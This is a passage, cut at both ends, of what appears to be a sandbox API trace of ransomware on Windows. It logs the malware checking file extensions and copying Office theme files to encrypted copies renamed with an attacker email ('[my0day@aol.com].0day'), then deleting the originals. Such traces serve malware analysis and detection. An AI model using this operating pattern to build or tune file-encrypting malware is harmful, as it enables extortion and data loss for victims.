lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.215] WriteFile (in: hFile=0x20c, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.215] SetEndOfFile (hFile=0x20c) returned 1 [0044.215] CloseHandle (hObject=0x20c) returned 1 [0044.215] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.215] SetEndOfFile (hFile=0x1c4) returned 1 [0044.216] CloseHandle (hObject=0x1c4) returned 1 [0044.216] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0044.216] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif")) returned 1 [0044.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0044.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0044.216] lstrlenW (lpString=".doc") returned 4 [0044.216] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.217] lstrlenW (lpString=".docx") returned 5 [0044.217] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.217] lstrlenW (lpString=".pdf") returned 4 [0044.217] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.217] lstrlenW (lpString=".xls") returned 4 [0044.217] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.217] lstrlenW (lpString=".xlsx") returned 5 [0044.217] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.217] lstrlenW (lpString=".ppt") returned 4 [0044.217] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0044.217] lstrlenW (lpString=".zip") returned 4 [0044.217] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.217] lstrlenW (lpString=".rar") returned 4 [0044.217] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.217] lstrlenW (lpString=".bz2") returned 4 [0044.217] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.217] lstrlenW (lpString=".7z") returned 3 [0044.217] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0044.217] lstrlenW (lpString=".dbf") returned 4 [0044.217] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0044.217] lstrlenW (lpString=".1cd") returned 4 [0044.217] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0044.217] lstrlenW (lpString=".jpg") returned 4 [0044.217] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0044.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0044.217] lstrlenW (lpString=".doc") returned 4 [0044.217] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.217] lstrlenW (lpString=".docx") returned 5 [0044.218] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.218] lstrlenW (lpString=".pdf") returned 4 [0044.218] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.218] lstrlenW (lpString=".xls") returned 4 [0044.218] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.218] lstrlenW (lpString=".xlsx") returned 5 [0044.218] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.218] lstrlenW (lpString=".ppt") returned 4 [0044.218] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0044.218] lstrlenW (lpString=".zip") returned 4 [0044.218] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.218] lstrlenW (lpString=".rar") returned 4 [0044.218] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.218] lstrlenW (lpString=".bz2") returned 4 [0044.218] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.218] lstrlenW (lpString=".7z") returned 3 [0044.218] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0044.218] lstrlenW (lpString=".dbf") returned 4 [0044.218] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0044.218] lstrlenW (lpString=".1cd") returned 4 [0044.218] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0044.218] lstrlenW (lpString=".jpg") returned 4 [0044.218] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.218] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0044.218] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.218] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0044.219] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=32607) returned 1 [0044.219] CloseHandle (hObject=0x1c4) returned 1 [0044.219] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png")) returned 0x20 [0044.219] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.219] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0044.219] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.219] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.219] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0044.219] GetLastError () returned 0x0 [0044.219] ReadFile (in: hFile=0x1c4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x7f5f, lpOverlapped=0x0) returned 1 [0044.226] WriteFile (in: hFile=0x20c, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x7f60, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x7f60, lpOverlapped=0x0) returned 1 [0044.227] ReadFile (in: hFile=0x1c4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.227] WriteFile (in: hFile=0x20c, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.228] SetEndOfFile (hFile=0x20c) returned 1 [0044.228] CloseHandle (hObject=0x20c) returned 1 [0044.228] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.228] SetEndOfFile (hFile=0x1c4) returned 1 [0044.229] CloseHandle (hObject=0x1c4) returned 1 [0044.229] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0044.229] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png")) returned 1 [0044.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0044.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0044.229] lstrlenW (lpString=".doc") returned 4 [0044.229] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.229] lstrlenW (lpString=".docx") returned 5 [0044.229] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.229] lstrlenW (lpString=".pdf") returned 4 [0044.229] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.229] lstrlenW (lpString=".xls") returned 4 [0044.230] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.230] lstrlenW (lpString=".xlsx") returned 5 [0044.230] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.230] lstrlenW (lpString=".ppt") returned 4 [0044.230] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0044.230] lstrlenW (lpString=".zip") returned 4 [0044.230] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.230] lstrlenW (lpString=".rar") returned 4 [0044.230] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.230] lstrlenW (lpString=".bz2") returned 4 [0044.230] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.230] lstrlenW (lpString=".7z") returned 3 [0044.230] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0044.230] lstrlenW (lpString=".dbf") returned 4 [0044.230] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0044.230] lstrlenW (lpString=".1cd") returned 4 [0044.230] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0044.230] lstrlenW (lpString=".jpg") returned 4 [0044.230] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0044.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0044.230] lstrlenW (lpString=".doc") returned 4 [0044.230] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.230] lstrlenW (lpString=".docx") returned 5 [0044.230] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.230] lstrlenW (lpString=".pdf") returned 4 [0044.230] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.230] lstrlenW (lpString=".xls") returned 4 [0044.230] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.231] lstrlenW (lpString=".xlsx") returned 5 [0044.231] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.231] lstrlenW (lpString=".ppt") returned 4 [0044.231] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.231] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0044.231] lstrlenW (lpString=".zip") returned 4 [0044.231] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.231] lstrlenW (lpString=".rar") returned 4 [0044.231] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.231] lstrlenW (lpString=".bz2") returned 4 [0044.231] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.231] lstrlenW (lpString=".7z") returned 3 [0044.231] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.231] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0044.231] lstrlenW (lpString=".dbf") returned 4 [0044.231] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.231] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0044.231] lstrlenW (lpString=".1cd") returned 4 [0044.231] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.231] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0044.231] lstrlenW (lpString=".jpg") returned 4 [0044.231] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.231] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0044.231] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.231] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0044.256] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=2044) returned 1 [0044.256] CloseHandle (hObject=0x1c4) returned 1 [0044.256] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif")) returned 0x20 [0044.256] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.257] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0044.257] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.257] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.257] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0044.722] GetLastError () returned 0x0 [0044.722] ReadFile (in: hFile=0x1c4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x7fc, lpOverlapped=0x0) returned 1 [0044.723] WriteFile (in: hFile=0x1d8, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x800, lpOverlapped=0x0) returned 1 [0044.724] ReadFile (in: hFile=0x1c4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.724] WriteFile (in: hFile=0x1d8, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.724] SetEndOfFile (hFile=0x1d8) returned 1 [0044.724] CloseHandle (hObject=0x1d8) returned 1 [0044.724] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.724] SetEndOfFile (hFile=0x1c4) returned 1 [0044.725] CloseHandle (hObject=0x1c4) returned 1 [0044.725] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0044.725] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif")) returned 1 [0044.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0044.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0044.726] lstrlenW (lpString=".doc") returned 4 [0044.726] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.726] lstrlenW (lpString=".docx") returned 5 [0044.726] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.726] lstrlenW (lpString=".pdf") returned 4 [0044.726] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.726] lstrlenW (lpString=".xls") returned 4 [0044.726] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.726] lstrlenW (lpString=".xlsx") returned 5 [0044.726] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.726] lstrlenW (lpString=".ppt") returned 4 [0044.726] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0044.726] lstrlenW (lpString=".zip") returned 4 [0044.726] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.726] lstrlenW (lpString=".rar") returned 4 [0044.726] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.726] lstrlenW (lpString=".bz2") returned 4 [0044.726] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.726] lstrlenW (lpString=".7z") returned 3 [0044.726] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0044.726] lstrlenW (lpString=".dbf") returned 4 [0044.726] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0044.726] lstrlenW (lpString=".1cd") returned 4 [0044.726] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0044.726] lstrlenW (lpString=".jpg") returned 4 [0044.726] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0044.727] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0044.727] lstrlenW (lpString=".doc") returned 4 [0044.727] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.727] lstrlenW (lpString=".docx") returned 5 [0044.727] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.727] lstrlenW (lpString=".pdf") returned 4 [0044.727] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.727] lstrlenW (lpString=".xls") returned 4 [0044.727] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.727] lstrlenW (lpString=".xlsx") returned 5 [0044.727] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.727] lstrlenW (lpString=".ppt") returned 4 [0044.727] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.727] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0044.727] lstrlenW (lpString=".zip") returned 4 [0044.727] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.727] lstrlenW (lpString=".rar") returned 4 [0044.727] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.727] lstrlenW (lpString=".bz2") returned 4 [0044.727] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.727] lstrlenW (lpString=".7z") returned 3 [0044.727] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.727] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0044.727] lstrlenW (lpString=".dbf") returned 4 [0044.727] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.727] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0044.727] lstrlenW (lpString=".1cd") returned 4 [0044.727] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.727] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 76 [0044.727] lstrlenW (lpString=".jpg") returned 4 [0044.727] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.728] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0044.728] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.728] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0045.014] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=28595) returned 1 [0045.014] CloseHandle (hObject=0x1d8) returned 1 [0045.014] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png")) returned 0x20 [0045.014] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0045.014] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0045.014] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.014] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.014] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0045.014] GetLastError () returned 0x0 [0045.014] ReadFile (in: hFile=0x1d8, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x6fb3, lpOverlapped=0x0) returned 1 [0045.130] WriteFile (in: hFile=0x198, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x6fc0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x6fc0, lpOverlapped=0x0) returned 1 [0045.131] ReadFile (in: hFile=0x1d8, lpBuffer=0x3270020, 